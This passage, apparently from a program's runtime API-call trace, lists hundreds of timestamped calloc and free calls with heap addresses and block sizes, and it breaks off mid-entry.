(_Block=0x1fa1000) [0064.474] free (_Block=0x1fa1090) [0064.474] free (_Block=0x1fa1120) [0064.474] free (_Block=0x1fa11b0) [0064.474] free (_Block=0x1fa1240) [0064.474] free (_Block=0x1fa12d0) [0064.474] free (_Block=0x1fa1360) [0064.474] free (_Block=0x77fea0) [0064.500] free (_Block=0x1fa1d80) [0064.500] free (_Block=0x1fa1cf0) [0064.500] free (_Block=0x1fa1c60) [0064.500] free (_Block=0x1fa1bd0) [0064.500] free (_Block=0x1fa1b40) [0064.500] free (_Block=0x1fa1ab0) [0064.500] free (_Block=0x1fa1a20) [0064.500] free (_Block=0x1fa1990) [0064.500] free (_Block=0x1fa1900) [0064.500] free (_Block=0x1fa1870) [0064.500] free (_Block=0x1fa17e0) [0064.500] free (_Block=0x1fa1750) [0064.500] free (_Block=0x1fa16c0) [0064.500] free (_Block=0x1fa1630) [0064.500] free (_Block=0x1fa15a0) [0064.500] free (_Block=0x1fa1510) [0064.500] free (_Block=0x1fa1480) [0064.500] free (_Block=0x1fa0af0) [0064.500] free (_Block=0x1fa0b80) [0064.500] free (_Block=0x1fa0c10) [0064.500] free (_Block=0x1fa0ca0) [0064.500] free (_Block=0x1fa0d30) [0064.500] free (_Block=0x1fa0dc0) [0064.500] free (_Block=0x1fa0e50) [0064.500] free (_Block=0x1fa0ee0) [0064.500] free (_Block=0x1fa0f70) [0064.500] free (_Block=0x1fa1000) [0064.501] free (_Block=0x1fa1090) [0064.501] free (_Block=0x1fa1120) [0064.501] free (_Block=0x1fa11b0) [0064.501] free (_Block=0x1fa1240) [0064.501] free (_Block=0x1fa12d0) [0064.501] free (_Block=0x1fa1360) [0064.501] free (_Block=0x77fea0) [0064.501] free (_Block=0x77db40) [0064.501] free (_Block=0x77dbc8) [0064.501] free (_Block=0x1fa13f0) [0064.501] free (_Block=0x1fa0048) [0064.514] free (_Block=0x1fa1d80) [0064.514] free (_Block=0x1fa1cf0) [0064.514] free (_Block=0x1fa1c60) [0064.514] free (_Block=0x1fa1bd0) [0064.514] free (_Block=0x1fa1b40) [0064.514] free (_Block=0x1fa1ab0) [0064.514] free (_Block=0x1fa1a20) [0064.514] free (_Block=0x1fa1990) [0064.514] free (_Block=0x1fa1900) [0064.514] free (_Block=0x1fa1870) [0064.514] free (_Block=0x1fa17e0) [0064.514] free (_Block=0x1fa1750) [0064.514] free (_Block=0x1fa16c0) [0064.514] free (_Block=0x1fa1630) [0064.514] free (_Block=0x1fa15a0) [0064.514] free (_Block=0x1fa1510) [0064.514] free (_Block=0x1fa1480) [0064.514] free (_Block=0x1fa0af0) [0064.514] free (_Block=0x1fa0b80) [0064.514] free (_Block=0x1fa0c10) [0064.514] free (_Block=0x1fa0ca0) [0064.514] free (_Block=0x1fa0d30) [0064.514] free (_Block=0x1fa0dc0) [0064.514] free (_Block=0x1fa0e50) [0064.514] free (_Block=0x1fa0ee0) [0064.514] free (_Block=0x1fa0f70) [0064.514] free (_Block=0x1fa1000) [0064.514] free (_Block=0x1fa1090) [0064.515] free (_Block=0x1fa1120) [0064.515] free (_Block=0x1fa11b0) [0064.515] free (_Block=0x1fa1240) [0064.515] free (_Block=0x1fa12d0) [0064.515] free (_Block=0x1fa1360) [0064.515] free (_Block=0x77fea0) [0064.533] free (_Block=0x1fa12d0) [0064.533] free (_Block=0x1fa1240) [0064.533] free (_Block=0x1fa11b0) [0064.533] free (_Block=0x1fa1120) [0064.533] free (_Block=0x1fa1090) [0064.533] free (_Block=0x1fa1000) [0064.533] free (_Block=0x1fa0f70) [0064.533] free (_Block=0x1fa0ee0) [0064.533] free (_Block=0x1fa0e50) [0064.533] free (_Block=0x1fa0dc0) [0064.533] free (_Block=0x1fa0d30) [0064.533] free (_Block=0x1fa0ca0) [0064.533] free (_Block=0x1fa0c10) [0064.533] free (_Block=0x1fa0b80) [0064.533] free (_Block=0x1fa0af0) [0064.533] free (_Block=0x1fa1480) [0064.533] free (_Block=0x1fa1510) [0064.533] free (_Block=0x1fa15a0) [0064.533] free (_Block=0x1fa1630) [0064.533] free (_Block=0x1fa16c0) [0064.533] free (_Block=0x1fa1750) [0064.533] free (_Block=0x1fa17e0) [0064.533] free (_Block=0x1fa1870) [0064.534] free (_Block=0x1fa1900) [0064.534] free (_Block=0x1fa1990) [0064.534] free (_Block=0x1fa1a20) [0064.534] free (_Block=0x1fa1ab0) [0064.534] free (_Block=0x1fa1b40) [0064.534] free (_Block=0x1fa1bd0) [0064.534] free (_Block=0x1fa1c60) [0064.534] free (_Block=0x1fa1cf0) [0064.534] free (_Block=0x1fa1d80) [0064.534] free (_Block=0x1fa1360) [0064.534] free (_Block=0x77fea0) [0064.564] free (_Block=0x1fa12d0) [0064.564] free (_Block=0x1fa1240) [0064.564] free (_Block=0x1fa11b0) [0064.564] free (_Block=0x1fa1120) [0064.564] free (_Block=0x1fa1090) [0064.564] free (_Block=0x1fa1000) [0064.564] free (_Block=0x1fa0f70) [0064.564] free (_Block=0x1fa0ee0) [0064.564] free (_Block=0x1fa0e50) [0064.565] free (_Block=0x1fa0dc0) [0064.565] free (_Block=0x1fa0d30) [0064.565] free (_Block=0x1fa0ca0) [0064.565] free (_Block=0x1fa0c10) [0064.565] free (_Block=0x1fa0b80) [0064.565] free (_Block=0x1fa0af0) [0064.565] free (_Block=0x1fa1480) [0064.565] free (_Block=0x1fa1510) [0064.565] free (_Block=0x1fa15a0) [0064.565] free (_Block=0x1fa1630) [0064.565] free (_Block=0x1fa16c0) [0064.565] free (_Block=0x1fa1750) [0064.565] free (_Block=0x1fa17e0) [0064.565] free (_Block=0x1fa1870) [0064.565] free (_Block=0x1fa1900) [0064.565] free (_Block=0x1fa1990) [0064.565] free (_Block=0x1fa1a20) [0064.565] free (_Block=0x1fa1ab0) [0064.565] free (_Block=0x1fa1b40) [0064.565] free (_Block=0x1fa1bd0) [0064.565] free (_Block=0x1fa1c60) [0064.565] free (_Block=0x1fa1cf0) [0064.565] free (_Block=0x1fa1d80) [0064.565] free (_Block=0x1fa1360) [0064.565] free (_Block=0x77fea0) [0064.565] calloc (_Count=0x40, _Size=0x4) returned 0x77fea0 [0064.565] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0158 [0064.565] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.565] calloc (_Count=0x42, _Size=0x4) returned 0x1fa0260 [0064.565] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.565] calloc (_Count=0x3, _Size=0x4) returned 0x77ffa8 [0064.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0370 [0064.566] free (_Block=0x1fa0158) [0064.566] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.566] free (_Block=0x77dc50) [0064.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0480 [0064.566] free (_Block=0x1fa1360) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc0 [0064.566] calloc (_Count=0x3, _Size=0x4) returned 0x77ffd0 [0064.566] free (_Block=0x7713d8) [0064.566] free (_Block=0x77ffc0) [0064.566] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1360 [0064.566] free (_Block=0x77ffd0) [0064.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0590 [0064.566] free (_Block=0x1fa1360) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.566] free (_Block=0x7713d8) [0064.566] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.567] free (_Block=0x7713d8) [0064.567] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.653] free (_Block=0x7713d8) [0064.653] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.653] free (_Block=0x7713d8) [0064.653] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.653] free (_Block=0x7713d8) [0064.653] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.653] free (_Block=0x7713d8) [0064.653] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.653] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] free (_Block=0x7713d8) [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.654] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.655] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.656] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.656] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.656] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.656] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.656] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.656] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0064.657] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0064.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.657] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.657] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0268 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0064.657] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0064.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0380 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc8 [0064.657] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.657] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1d80 [0064.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0490 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.657] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.658] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0064.659] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0064.660] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.666] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.666] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.666] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.666] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.666] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.666] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0064.666] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.666] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0064.667] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.667] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.667] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0268 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0064.667] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.667] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0380 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc8 [0064.667] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.667] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0064.667] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0490 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.667] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.668] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.669] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.669] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0064.669] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0064.669] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0064.669] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0064.837] free (_Block=0x1fa1d80) [0064.837] free (_Block=0x1fa1cf0) [0064.837] free (_Block=0x1fa1c60) [0064.837] free (_Block=0x1fa1bd0) [0064.837] free (_Block=0x1fa1b40) [0064.837] free (_Block=0x1fa1ab0) [0064.837] free (_Block=0x1fa1a20) [0064.837] free (_Block=0x1fa1990) [0064.837] free (_Block=0x1fa1900) [0064.837] free (_Block=0x1fa1870) [0064.837] free (_Block=0x1fa17e0) [0064.837] free (_Block=0x1fa1750) [0064.837] free (_Block=0x1fa16c0) [0064.837] free (_Block=0x1fa1630) [0064.837] free (_Block=0x1fa15a0) [0064.837] free (_Block=0x1fa1510) [0064.837] free (_Block=0x1fa1480) [0064.837] free (_Block=0x1fa0af0) [0064.837] free (_Block=0x1fa0b80) [0064.837] free (_Block=0x1fa0c10) [0064.837] free (_Block=0x1fa0ca0) [0064.837] free (_Block=0x1fa0d30) [0064.837] free (_Block=0x1fa0dc0) [0064.837] free (_Block=0x1fa0e50) [0064.837] free (_Block=0x1fa0ee0) [0064.837] free (_Block=0x1fa0f70) [0064.837] free (_Block=0x1fa1000) [0064.838] free (_Block=0x1fa1090) [0064.838] free (_Block=0x1fa1120) [0064.838] free (_Block=0x1fa11b0) [0064.838] free (_Block=0x1fa1240) [0064.838] free (_Block=0x1fa12d0) [0064.838] free (_Block=0x1fa1360) [0064.838] free (_Block=0x77fea0) [0064.838] free (_Block=0x77db40) [0064.838] free (_Block=0x77dbc8) [0064.838] free (_Block=0x1fa13f0) [0064.838] free (_Block=0x1fa0048) [0064.838] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0064.838] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0064.838] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.838] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0064.838] free (_Block=0x77dc50) [0064.838] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0064.838] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0064.838] calloc (_Count=0x1, _Size=0x4) returned 0x7713d8 [0064.838] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0064.838] free (_Block=0x7713d8) [0064.838] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0064.838] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0064.838] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0268 [0064.838] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0064.839] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0064.839] free (_Block=0x77dc50) [0064.839] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0380 [0064.839] free (_Block=0x1fa12d0) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x77ffc8 [0064.839] calloc (_Count=0x3, _Size=0x4) returned 0x1fa0490 [0064.839] free (_Block=0x7713d8) [0064.839] free (_Block=0x77ffc8) [0064.839] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0064.839] free (_Block=0x1fa0490) [0064.839] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0490 [0064.839] free (_Block=0x1fa12d0) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.839] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.839] free (_Block=0x7713d8) [0064.840] calloc (_Count=0x2, _Size=0x4) returned 0x7713d8 [0064.840] free (_Block=0x7713d8) [0064.840] calloc (_Count=0x2, _Size=0x4) 